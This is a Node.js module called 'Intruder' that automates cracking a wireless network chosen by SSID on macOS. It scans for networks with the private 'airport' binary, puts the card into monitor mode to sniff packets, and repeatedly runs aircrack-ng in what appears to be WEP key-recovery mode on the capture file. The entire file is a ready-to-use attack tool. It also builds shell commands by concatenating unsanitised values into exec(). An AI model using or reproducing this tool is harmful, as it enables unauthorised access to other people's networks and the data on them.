
/**
 * Dependencies.
 */

var exec = require('child_process').exec;
var lsof = require('lsof');

/**
 * Airport binary.
 */

var airport = '/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport';

/**
 * Expose `Intruder`.
 */

module.exports = Intruder;

/**
 * Initialize an `Intruder` with `options`.
 *
 * Options:
 *
 * 	- `interval` the time between crack attempts
 * 	- `channel` the network channel
 *
 * @param {Object} opts
 * @api public
 */

function Intruder(opts) {
  if (!(this instanceof Intruder)) return new Intruder(opts);
  opts = opts || {};

  this.interval = opts.interval || 2000000;
  this.channel = opts.channel;
}

/**
 * Crack the network by ssid.
 *
 * @param {String} ssid
 * @param {Function} done
 * @api public
 */

Intruder.prototype.crack = function(ssid, done) {
  var interval = this.interval;
  var channel = this.channel;
  var self = this;

  discover(function(err, networks) {
    if (err) return done(error(err));

    var network = parse(ssid, networks);
    if (!network) return done(error('network not found'));

    channel = channel || network[2];
    var bssid = network[1];

    self.sniff(channel, function(file) {
      setInterval(decrypt, interval);

      function decrypt() {
        exec('aircrack-ng -1 -a 1 -b ' + bssid + ' ' + file, function(err, res) {
          if (err) return done(error(err));
          return done(null, res);
        });
      }
    });
  });
};

/**
 * Sniff network packets with the wireless card in monitor mode.
 *
 * TODO: differentiate en0 from en1
 *
 * @param {String} channel
 * @param {Function} done
 * @api public
 */

Intruder.prototype.sniff = function(channel, done) {
  var child = exec(airport + ' en0 sniff ' + channel);
  setTimeout(capture, 50);

  function capture() {
    lsof.raw(child.pid, function(files) {
      files.forEach(function(file) {
        if (file.name && file.name.indexOf('airportSniff') !== -1) {
          done(file);
        }
      });
    });
  }
};

/**
 * Discover wireless networks.
 *
 * @param {Function} done
 */

function discover(done) {
  exec(airport + ' --scan', done);
}

/**
 * Parse the access point's bssid and channel.
 *
 * @param {String} ssid
 * @param {String} networks
 */

function parse(ssid, networks) {
  var re = new RegExp(ssid + ' (\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}) -\\d{2}  (\\d+)');

  return networks
    .split('\n')
    .map(function(line) {
      return line.trim().match(re);
    })
    .filter(function(line) {
      return line;
    })[0];
}

/**
 * Error.
 *
 * @param {String} msg
 */

function error(msg) {
  return new Error(msg);
}
